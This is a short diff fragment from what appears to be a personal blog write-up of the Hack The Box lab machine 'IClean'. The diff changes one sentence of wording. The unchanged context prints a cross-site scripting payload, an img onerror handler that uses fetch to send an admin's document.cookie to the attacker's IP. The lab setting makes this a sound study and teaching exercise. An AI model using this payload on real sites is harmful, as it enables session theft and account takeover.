TheRedP4nther/theredp4nther.github.io/_writeups/2024/HTB/IClean.md

 <br />

-We have an XSS so to take advantage of it we built a payload with fetch to try to steal the cookies from some admin who is behind the web loading our malicious code and SURPRISE!:
+We have an XSS so to take advantage of it we built a payload with fetch to try to steal the cookies from some admin who is behind the web loading our malicious code:

 Payload -> \<img src=x onerror=fetch("http://10.10.14.13/+document.cookie")\>\</img\>